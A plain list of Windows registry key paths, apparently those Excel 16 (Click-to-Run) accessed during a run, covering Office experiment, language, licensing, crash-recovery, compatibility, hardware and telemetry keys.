HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Experiment\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\Language
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\DevInstall
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\UpdateSupport\ExpiredBuild
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\A0558DE0-FA56-4EDB-A1A7-B664BBA7BA31\culture\x-none.16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\A0558DE0-FA56-4EDB-A1A7-B664BBA7BA31\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ExperimentDogfood
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\Experiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\VersionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\ChunkCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.10
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.11
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.12
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.13
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.14
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.15
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.16
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.17
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.18
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.19
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.20
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.21
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.22
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.23
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.24
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.25
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.26
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.27
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.28
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.29
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.30
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ETag
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\MsoWerCrashDllPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\MsoWerCrashDllPath
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6764
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6764\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\CrashPersistence\EXCEL\6764
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\CrashPersistence\EXCEL\6768
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6768
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6768\0
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\GOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\GOM\ComplexRanges
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Debug
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Debug
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\CVH\VirtualProductInfo
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\CVH\VirtualProductInfo\PackageGUID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2527171340-3306644326-1278290521-1001\Components\0BC77486A266BF84FAE259379C82967F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0BC77486A266BF84FAE259379C82967F
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ProductCodeListForC2RGimme
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ProductCodeListForC2RGimme\{90160000-000F-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}\ClickToRun
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\ProductFiles
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2527171340-3306644326-1278290521-1001\Installer\Products\00006109F00000000000000000F01FEC
HKEY_USERS\S-1-5-21-2527171340-3306644326-1278290521-1001\Software\Microsoft\Installer\Products\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\SKULanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures\en-us
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2527171340-3306644326-1278290521-1001\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_USERS\S-1-5-21-2527171340-3306644326-1278290521-1001\Software\Microsoft\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\1A705E72D3831594090DD020E37EFC1A
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredUILanguageTagPendingInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\FollowSystemUILanguage
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\UILanguageInstallerFallbackOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LanguagePackTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\EnabledLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\AuthoringLanguageCloud
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LanguageResources\LocalCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LocalCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LocalCache\RegionalAndLanguageSettingsAccount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\InstallFonts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Srp\GP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Srp\GP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Srp\GP\RuleCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Graphics\EnableWinCompBackEnd
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\WindowsRuntime\WellKnownContracts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\WellKnownContracts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\WellKnownContracts\Windows.Foundation.UniversalApiContract
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService\DefaultAuthLevel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Graphics
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Graphics
HKEY_CURRENT_USER
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface\SecurityDescriptor
HKEY_CURRENT_USER\Software\Microsoft\DirectX\UserGpuPreferences
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DirectXApps.sdb
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DisableDoubleQuerySdbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\ManifestedMergeStubSdbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\ManifestedMergeStubSdbs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\{8b27f84f-daa8-4494-a679-5e23975d9644}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\{8b27f84f-daa8-4494-a679-5e23975d9644}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1EDD7E79811EB814A93FCB6559FABECE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1EDD7E79811EB814A93FCB6559FABECE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Resiliency
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Resiliency
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Resiliency\AddInList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\7te
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Resiliency\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\Security
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\EnableProcessAslrPolicy
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\GridLineScaleByDpi
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RenderForMonitorDpi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\~MHz
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\MachineId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemFamily
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemSKU
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\MotherboardUUID
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2527171340-3306644326-1278290521-1001\Components\820E548C190EE2442820125F695C950A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\820E548C190EE2442820125F695C950A
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\EXCELFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ImmersiveWorkbookDirtySentinel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookAutoRecoverDirty
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookOpenedCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSystemSeparators
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ThousandsSeparator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DecimalSeparator
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Toolbars\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ShowLensTooltip
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableTouchUIA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AirDrop
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\BypassMigration
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\OPWBypassMigration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Excel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\User Settings\
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_CoreReg
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Intl
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\outexum
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\outexum\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_Intl
